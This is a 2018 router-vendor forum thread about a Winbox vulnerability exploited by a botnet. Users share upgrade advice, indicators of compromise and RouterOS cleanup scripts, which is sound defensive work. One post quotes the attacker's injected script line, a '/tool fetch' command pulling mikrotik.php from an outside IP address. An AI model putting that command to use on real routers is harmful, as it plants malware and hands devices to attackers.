Page 1 of 2

Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:34 pm
by normis
It has come to our attention that a rogue botnet is currently using the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings. Delete SOCKS configurations, and any unknown scripts
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

[UPDATED with specific versions]: Full details on what to do and what is affected: https://blog.mikrotik.com/security/winb ... ility.html

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:41 pm
by Samot
@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:49 pm
by normis
@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.
it's already in the blog, because it is the same vulnerability.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:51 pm
by Samot
That's what I figured.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 3:11 pm
by dada
Hi Normis,

what you wrote above may look for someone that 6.40.8 (bugfix) is not secure too. I would like you mention that this bugfix release is secure too (blog needs correction too but it mention that 6.40.8 is OK at least).

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 4:42 pm
by tippenring
@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.
I'm with @Samot. If it's worth a forum post, it's worth posting a similar update to the blog. As soon as the blog was announced I added it to my important RSS feeds so I get fast notifications.
Maybe not a lot of people are monitoring the blog posts yet, but I think to err on the side of a little extra communication is warranted.

On forum posts if the subject line doesn't interest me, I would never read it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 4:49 pm
by BartoszP
On forum posts if the subject line doesn't interest me, I would never read it.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me. :D

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 5:26 pm
by acruhl
I got a news article about this today through my Google feed. I immediately realized that this is a problem that has been fixed a while.

But I agree a short new blog post pointing to the earlier post would reduce confusion. People would be coming here looking for new information.

I hope it's clear to people that ports on public facing networks should be blocked using the firewall... Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 6:40 pm
by tippenring
On forum posts if the subject line doesn't interest me, I would never read it.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me. :D
lol. Nice try, but the analogy is weak. A song can be in the background and doesn't consume any time.

This forum is very busy. I do not have time to read all the posts. I am notified of new/updated forum posts via email. A good subject line will get me spend the time to read the post.

Incidentally, I *really* wish the forum email notifications included the content of the post.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:25 pm
by jbird
Hi Normis,

what you wrote above may look for someone that 6.40.8 (bugfix) is not secure too. I would like you mention that this bugfix release is secure too (blog needs correction too but it mention that 6.40.8 is OK at least).
So, is 6.40.8 secured against this vulnerability or is it not?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:31 pm
by abjornson
I'd also really like confirmation on whether the latest bugfix ( 6.40.8 ) release has been patched for this vulnerability.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:56 pm
by Kindis
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 10:28 pm
by ludvik

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:15 am
by garethiowc
this has caused me a nightmare :lol:

Lesson learnt that's for sure.

i'm so glad the script didn't reset any routers but still it's going to take a few days to sort them all out :shock:

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:58 am
by kobuki
On the first link WinboxExploit.py reveals that the admin password is stored in the clear in the device. It simply requests the userdb and prints stuff found at offset 55. Mind == blown.

Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:25 am
by Janevski
Hopefully, by using such zero day, somebody hacks, enters into MikroTik HQ, steals, borrows, forks, acquires by using magnets, liberates the source code and makes GNU/RouterOS, so no such zero day happens ever again. :D
Image

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:47 am
by LeftyTs
Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...
Even that could get hacked. It is exposed to annoying dictionary attacks all the time. Now days, best practice is to simply work through carefully secured and encrypted VPNs and nothing else open to the public.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:59 am
by vecernik87
@Normis: Thank you for the email. I know I was pain in the a** by repeatedly pointing it out, but I believe it was simply missed. It is a bit shame it took so long but I really appreciate this step in order to help RouterOS users secure their devices.
Please be assured that I never wanted to show any hostility against Mikrotik. All my posts were in pursuit of safety for other users, which will in the end help Mikrotik by improving relationship and trust with customers.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:54 am
by normis
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:11 am
by BartoszP
Normis ...
It seems to be a fight with windmills ... this is era when most people read JUST THE TOPIC and do not read more than one sentence of news and most of them do not even want to think what they are reading about. Topic is all information they want to know.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:21 am
by SilverNodashi
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:30 am
by BartoszP
To not be blamed that they do nothing !!!!

Have you read carefully all recent posts on forum about this "problem"?

Mikrotik is almost blamed for not upgraded 70k+ routers in Brazil, that people are not informed and so on ...

PS.

Windmills +1

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:59 am
by msatter
In our country we have a lot of windmills and we don't fight them, we use them. However we have a "Bierkaai" and yes that has to do with beer...and not weed despite it arrives in the same city.

De Bierkaai was the quay in Amsterdam where the barrels of beer arrived and the porters worked who loaded and unloaded the heavy barrels with beer.
The residents of this part of Amsterdam were known as invincible fighters and seeking a fight with them, was one you absolutely would loose.


So whenever you come to Amsterdam to smoke, illegally produced weed then, ask about the "Bierkaai". It was a part of the "Oudezijds Voorburgwal", located near the "Oude Kerk".

I wrote on many occasions that security has improved in last time. And this security 'problem' was more than a wakeup call and it will have carry a lot of fallout and we are only at the beginning of that. I wrote about what cloud have/should have done in the past months to inform and warn owners of Mikrotik devices.

Others and I have written a lot of suggestions in the past in different topics and please do something with those suggestions and make a plan so that this will not happen again.
It might take drastic measures which are not seen before but having these kinds of problems can even kill a company, if trust in that company collapses.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 10:21 am
by BartoszP
As Oude Kirk is about 5 min. walking from Central Station then most people start and end visiting Amsterdam do not crossing Damstraat and they are missing eg. Rembrandt's Museum. Not even trying to visit or just find any windmill Nederlands are famous for :-)

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 10:49 am
by CZFan
I received an e-mail this morning from one of our Mikrotik distributors here in South Africa, and note this is not the first one I have received from them re Mikrotik Notice.

So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
MTNotice.JPG

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:55 pm
by kobuki
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe. That aside, your quick reaction and fix is exemplary, so we should thank you for that. But please allow some of us to be a little skeptical after the fact that in 2018 you still stored (past tense) something as sensitive in the device as a password, in clear text. Anyway, hoping for the best and life goes on.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:06 pm
by BartoszP
...Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe....
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persude" to upgrade? What if user says NO? What if admins in DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If car company makes mistake in a car it calls people to service point but someone ignoring this call will be using bad car forever.
If food company needs to collect some "bad" food from market, in spite of problems in production process, it is imposible to persudae anyone to return it. All owners could be asked to return but nothing more.

It all depends on users/owners will !!!

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:13 pm
by vecernik87
So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
The email was released AFTER the news about botnet. It again happened after negative publicity hit the media, despite the fact I was many times asking to send the email earlier.
It was same mistake as previous email, which was sent on March 2018 after whole world was floded with news about "vpnfilter" malware (which was using March 2017 webserver vulnerability)

I really want Mikrotik to succeed and I promote them around my business as I can, and if would be much easier, if emails come as preemptive actions instead of reaction to negative publicity in news.
I know they don't have to, but imagine how much positive publicity Mikrotik can get, if they proactively warn users after the vulnerability is found and fixed and before it gets massively misused. My personal opinion - it would be like a dream! And cost of mass email is not that high...

I definitely disagree with idea from this topic about home-calling routers, pushing users to update etc.. That is not necessary and create more issues than it solves.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:21 pm
by msatter
AVM (Fritz!box) does it because they are in the SOHO area in which Mikrotik also more and more operative.

You can switch of automatic updates and be warned and even tell not to check. TR069 can also be disabled so you are the boss.

AVM sells routers in Germany, Poland, Netherlands, Belgium, Austria and Italy and many other countries. The premium ISP Xs4all in the Netherlands use Fritz!boxes as their customer device.

I replaced my Fritz!box because AVM is not anymore what it was in the past. I replaced it by Mikrotik but the Fritz!box is still doing WiFi, DECT, house automation.

I can pick up my phone and press a few butons to check if there is a update. If an update is waiting to be installed I get beep and a red light blinking on the DECT phone. I can upgrade by selecting the update and it will update the Fritz!box.

And yes, I have forbid the Fritz!box to check through the DNS server. No firewall rules needed.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:41 pm
by kobuki
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persude" to upgrade? What if user says NO? What if admins in DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If car company makes mistake in a car it calls people to service point but someone ignoring this call will be using bad car forever.
If food company needs to collect some "bad" food from market, in spite of problems in production process, it is imposible to persudae anyone to return it. All owners could be asked to return but nothing more.

It all depends on users/owners will !!!
No arguments against the importance of applying updates in time by owners whatsoever. But you're aware that car makers get sued for dysfunctional parts or functional parts having design mistakes, right? That's because they didn't do everything in their power and ability to prevent problems leading to (fatal) accidents. It's exactly because you can't tell users what to do why you need to do everything you can to prevent disasters such as this. If the passwords were stored as (strong) hashes, the security hole didn't exist to begin with. Well, being able to get the user db is still a problem, but by far not as serious. The only thing I'm pissed about is the pw storage which has been allegedly fixed along with the Winbox sechole (and very quickly, at that). And don't get me wrong, I will continue to use and advocate MT devices, they're great but these small mishaps are the ones that usually ruin the reputation of any thriving company.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:54 pm
by BartoszP
Once again:
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:53 pm
by CZFan
Once again:
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

Agree, and to mention it again, security will always be a "Reactive" problem

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 4:57 pm
by msatter
@CZFan, last you wrote that also but that thread was closed before I could read it.

Security is for 95% reacting to a attack the remaining 5% can cause more damage than the 95%.

I mentioned AVM, they had not long ago big hole in their VOIP system. It was patched and rolled out within a few weeks to all AVM routers. Mikrotik had months time.

https://www.cvedetails.com/cve/CVE-2015-7242/

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 5:54 pm
by excession
Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:01 pm
by msatter
A start can be found here: viewtopic.php?f=2&t=137375

Also check the blog for more information.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:03 pm
by kobuki
Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.
What potentially of interest is:
- change/activation of the socks service
- disabling "drop" rules in the fw (seen myself) or ones added allowing unconditional access (seen reported by others)
- unneeded/bogus/suspicious/deleted fw entries (reported by others)
- added suspicious scripts to system/scripts and associated scheduler entries
- deleted existing scripts (reported by others)

There might be others, too, do a search in the forums. I have regular backups using compact export .rsc files so I was able to do a diff and see all changes which I mentioned above, on a particular device.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 7:49 pm
by Tonda
So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:02 pm
by kobuki
So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?
Have you read the first post of this thread?

EDIT: hmm, now that you asked, and reading the blog post again, it's really not very apparent which version pertains to which release branch at a single glance. Both bugfix and recent stable releases are linear without additional marking. Although if you're fixated your updates on either of them you should be able to determine. 6.40.8 is the latest bugfix one, so it should be OK.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:39 pm
by DummyPLUG
From https://wiki.mikrotik.com/wiki/Manual:IP/Services it said MAC winbox using 20561/udp, is that it is better to block this port too?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:09 pm
by msatter
The MAC addressing is used inside the network (L2) and sometimes on the first hop to your ISP router/switch. MAC can't be blocked as discussed in other threads.

viewtopic.php?f=21&t=133533&p=656925&hi ... 51#p656925

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 11:20 pm
by Pea
So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?
Bugfix release tree
Release 6.40.8 2018-04-24
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
https://mikrotik.com/download/changelog ... lease-tree

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 11:31 pm
by Moky
MikroTik is at the top of the news today - but, unfortunately, not in a good connotation. :(
It bothers me the most that they put it in the same basket as the cheap Chinese networking manufacturers and vulnerable IoT stuff.

There is no CVE number related to this vulnerability - why? The people are confused with what is this "new" vulnerability because there is no CVE and there is no identifier that will tell them that this is the same vulnerability.
This is a standard way of doing this stuff - you make a CVE and reference it in your announcements and advisories, as well as change history in RouterOS.

You can't blame all of this on users, there are things that can be fixed also from the MikroTik side.
I work in a big enterprise with large amount of products and vendors, and I do follow only security mailing lists and advisories - because of the old one: "if something works well, don't touch it" (I patch and upgrade it only when there is a security vulnerability or a functional issue). Another reason is that I don't have enough time to follow all of the different announcements.

I have a few suggestions:
  • For every vulnerability (even the smallest one) create a CVE number with dates, short description etc.
  • If the vulnerability is critical, create an IPS/IDS (Snort or similar) rules so the people can protect themselves before they can upgrade all of the infrastructure.
  • Create Security sub-forum where people can ask related questions and take advices (I've seen a lot of MikroTik Wireless and Routing gurus that don't have enough security awareness).
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
  • Publish some security bug-bounty program and rewards - this way the chances are bigger that the security vulnerabilities will be reported to you and not sold on the DarkWeb or used by bad guys.


I really like MikroTik products and community - it really hurts when things like this happen (not to mention mocking that I get from our Cisco guys).

Kind regards,
Moky

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 3:48 am
by gotsprings
I made this to look for the common stuff. (Copy and paste into terminal.)

:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}

Open you log and look at the results. If you have a result with "!" you might have a problem.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 10:13 am
by dsich
i have found one of my customers router infected. How can i clean it remote?
I have changed the socks port to default and diabled. I have not found another user like admin. The passwort is changed. But in the files are the mikrotik.php. If i delete this, after 5 seconds its new.
Firmware now is 6.42.6. Its a HaP Lite. Winbox in Services is diabled, only Web over Port 80 is active and blocked from outside on my core router.

Thanks

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 10:30 am
by CZFan
This morning I received a mail directly from Mikrotik re vulnerability
MTNotice.JPG

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 11:17 am
by JimmyNyholm
I got the same Mail two days ago so perhaps they're having problem with the mail systems ? ;-)

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 1:33 pm
by gotsprings
i have found one of my customers router infected. How can i clean it remote?
I have changed the socks port to default and diabled. I have not found another user like admin. The passwort is changed. But in the files are the mikrotik.php. If i delete this, after 5 seconds its new.
Firmware now is 6.42.6. Its a HaP Lite. Winbox in Services is diabled, only Web over Port 80 is active and blocked from outside on my core router.

Thanks
Look in scripts and schedule.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 2:48 pm
by dsich
Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 3:27 pm
by R1CH
It's disappointing that both the httpd vulnerability and now the winbox vulnerability required mass exploitation before Mikrotik sent an email. Why not send these emails on day 1?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:00 am
by 43north
@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port :(.

I caught it in less than 24 hours because of the log file.

I had a backup config from a few days prior to the attack which I restored and then immediately upgraded to the latest current firmware release and routerboard firmware. Obviously reloading my prior backup undid all the changes that I noticed the bot put into my router (socks, script, scheduler, FW allow rule) etc. Can you confirm also that upgrading to the newest firmware actually cleans the malware?

Since then I have changed default port, only allowed IP SERVICES on local network, and setup mangle rules for anything that scans my current winbox port and adds it to a blacklist drop rule.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:20 am
by BartoszP
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:42 am
by 43north
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone reference my post.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:59 am
by BartoszP
Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is the quotation of the month ... maybe even of the year.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 10:09 am
by 43north
Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year.
I don't take it personal at all. It is my fault for not being more in tune. I own it 100%. Super frustrating. I appreciate the Mikrotik staff and what they do for us.

After reading some other posts I believe the steps that I took as I posted in this thread have mitigated any issues from the incident.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 10:28 am
by msatter
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone reference my post.

169,999 Routers to go. So yours was not the only router that was taken over, that easily.

I keep an eye on the active topics that shows all postings that are recent. The trouble is that important postings like vulnerability posting drop as fast of the rest.
They are swiftly out of sight and you will miss them if you don't check in, several times a day.

Off quote but on topic, would this vulnerability had the highest CVE rating of 10?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 11:05 am
by BartoszP

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:09 pm
by kobuki
  • ...
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
    ...
I think this one would be very useful. I for one am subscribed to multiple ones already, and do pay attention to what's announced there since they always concisely describe the issues and give the CVE number(s) where one can see the in-depth details. MT issues regular product and update emails, this is at least as important if not more. It's not enough to list simple update bullets like usual, the email sent out on the 2nd was by far more effective because of its detailed contents and warnings issued.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:10 pm
by volkeu
I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open you log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:22 pm
by msatter
Course I know where announcements a located, I am not stupid.

I am calling for doing that bit extra to inform all and keep an important notice im the picture.Creating the notice in announcements hope al is going being right from there is not working as is proven now.

Mikrotik has room improve also with the blog and if we keep fighting eachother like we are doing now, instead of thinking how to improve the whole Mikrotik eco system.
It may lead to Mikotik thinking we have still support how we are doing, have all done in the past and so keeps sitting on the sideline.

If that happens, and it looks now like that, we will have the same discussion again all over in time.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 2:26 pm
by CZFan
Atleast send a mail to the Mikrotik certified members

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 2:34 pm
by BartoszP
Mikrotik has room improve also with the blog...
Rhetorical question: Why people needs blogs, tweets or Facebook messages to feel beeing informed well?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:04 pm
by excession
Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:37 pm
by msatter
Mikrotik has room improve also with the blog...
Rhetorical question: Why people needs blogs, tweets or Facebook messages to feel beeing informed well?
Because Twitter and Facebook are not wideley accepted ways to communicate. Facebook is evil and Twitter 'rate limits' me so of the visits I make only 10% are successful views. This is not normal.

For me those two way of communicating don't fly.

The blog is there to have a central, always accessible information source. It is side to side with the forum, in which can be interacted.
The blog is a one way directional communication platform and so the information has to be complete and not redirect for further information to other sites. It has to be a single source.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:57 pm
by gotsprings
I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open you log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
What I put up was to help you determine if you had "been hit". Since I don't know how everyone else in the world set up their routers... I WOULD NOT SCRIPT IN CHANGES. It was merely a "Use this to see if you have some of the common signs of this attack."

What I built for routers I configured, removed and made changes based me knowing what it was going to do to a system.

For instance... I have firewall drop rules that are enabled and disabled based on other input.
Example: If the main ISP is down and system is on cellular. Enable the drop rule on the forwarding of guest traffic.
Now one might argue turning off the accept rule from the guest network would have the same effect...
But placing this at the top of the forwarding chain and setting it to drop ANYTHING from source GuestSubnet will stop the traffic sooner. Especially if the detection script also flushed the connections.
That drop rule is also activated by scheduler as well.

So its pretty common for one of my routers to have several drop rules disabled under normal operations.

Also... shutting off winbox... that might be bad too.

How about adding a jump chain to blacklist an IP after several unsuccessful log ins... Seems like a great idea too. But not knowing how someone else wrote their firewall...
Or
How about requiring port knocking to people to reach the router at all..
Or
Limiting IP scopes where admin access is available.

Those are all ways to go... but what I put up there was only meant to "look for signs". Its still up to the user to decide what to do about it.

And in your "script scheduler"
There are a few other additions I found. The most common entries I found across A LOT OF ROUTERS were
Schedules named "a" and "schedule3_".
